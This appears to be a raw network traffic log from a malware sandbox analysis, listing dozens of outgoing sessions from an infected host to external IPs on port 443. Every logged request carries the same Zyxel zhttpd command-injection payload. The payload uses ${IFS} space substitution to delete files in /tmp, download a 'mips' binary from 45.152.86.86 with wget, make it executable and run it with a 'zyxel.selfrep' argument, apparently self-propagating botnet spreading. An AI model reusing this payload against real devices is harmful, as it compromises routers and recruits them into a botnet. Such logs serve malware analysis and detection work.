                                        Mar 31, 2024 09:22:24.659244061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8030192.168.2.2347166163.202.211.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659329891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8031192.168.2.2354198158.222.186.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659384012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8032192.168.2.233661020.215.37.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659452915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8033192.168.2.235897454.221.82.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659543037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8034192.168.2.23339161.144.183.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659584999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8035192.168.2.2334056168.144.71.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659662962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8036192.168.2.2338570155.14.99.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659729004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8037192.168.2.2351044178.124.125.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659811020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8038192.168.2.2338490165.249.181.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659862041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8039192.168.2.233548487.202.31.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.659949064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8040192.168.2.234035884.159.55.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660022020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8041192.168.2.2352738170.205.240.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660084009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8042192.168.2.234448889.92.100.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660136938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8043192.168.2.234449452.28.183.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660238981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8044192.168.2.2336492182.182.162.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660299063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8045192.168.2.2338278194.27.139.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660381079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8046192.168.2.2346470160.137.248.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660437107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8047192.168.2.235929840.64.198.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660523891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8048192.168.2.2341634220.212.43.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660583019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8049192.168.2.233821874.67.67.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660660028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8050192.168.2.234806012.163.55.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660715103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8051192.168.2.235819231.41.135.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660770893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8052192.168.2.2333240120.26.65.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660859108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8053192.168.2.235804286.79.187.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660926104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8054192.168.2.2339302185.128.62.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.660995960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8055192.168.2.2335030206.42.105.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661063910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8056192.168.2.234858284.185.69.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661130905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8057192.168.2.2340560133.62.249.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661200047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8058192.168.2.2340270222.132.138.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661231995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8059192.168.2.235941238.152.70.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661283970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8060192.168.2.2340914143.17.78.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661350012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8061192.168.2.2349702124.73.227.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661429882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8062192.168.2.235160671.185.45.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661484957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8063192.168.2.2347236136.15.118.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661570072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8064192.168.2.233600451.59.25.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661647081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8065192.168.2.2360018192.141.95.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661705971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8066192.168.2.2346144192.111.143.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661789894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8067192.168.2.2354346131.200.67.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661878109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8068192.168.2.233923893.15.225.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.661941051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8069192.168.2.2342526198.66.87.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662000895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8070192.168.2.2347796110.97.63.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662071943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8071192.168.2.235434293.46.52.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662118912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8072192.168.2.2350014207.28.138.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662178993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8073192.168.2.233635497.219.49.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662260056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8074192.168.2.2341892134.128.228.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662323952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8075192.168.2.235438278.216.178.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662401915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8076192.168.2.235155239.204.162.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662465096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8077192.168.2.2351232152.138.68.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662549973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8078192.168.2.2348354136.48.191.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662622929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8079192.168.2.234992895.51.99.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662699938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8080192.168.2.233970883.8.26.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662761927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8081192.168.2.235416082.203.130.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662837982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8082192.168.2.234097645.67.202.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662914038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8083192.168.2.234060231.170.155.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.662966967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8084192.168.2.233821692.241.35.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663031101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8085192.168.2.2340114221.139.206.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663115978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8086192.168.2.2335604170.217.122.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663178921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8087192.168.2.2351648188.196.67.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663252115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8088192.168.2.2346512179.195.159.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663364887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8089192.168.2.2351980195.154.151.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663419962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8090192.168.2.2353368192.40.135.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663511038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8091192.168.2.235301443.135.68.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663589001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8092192.168.2.2352568164.126.195.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663628101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8093192.168.2.234714846.242.130.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663702011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8094192.168.2.2336830179.31.105.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663765907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8095192.168.2.2336500188.121.192.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663815975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8096192.168.2.2333166162.188.204.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:24.663881063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8097192.168.2.235204889.207.133.95443
                                        TimestampBytes transferredDirectionData
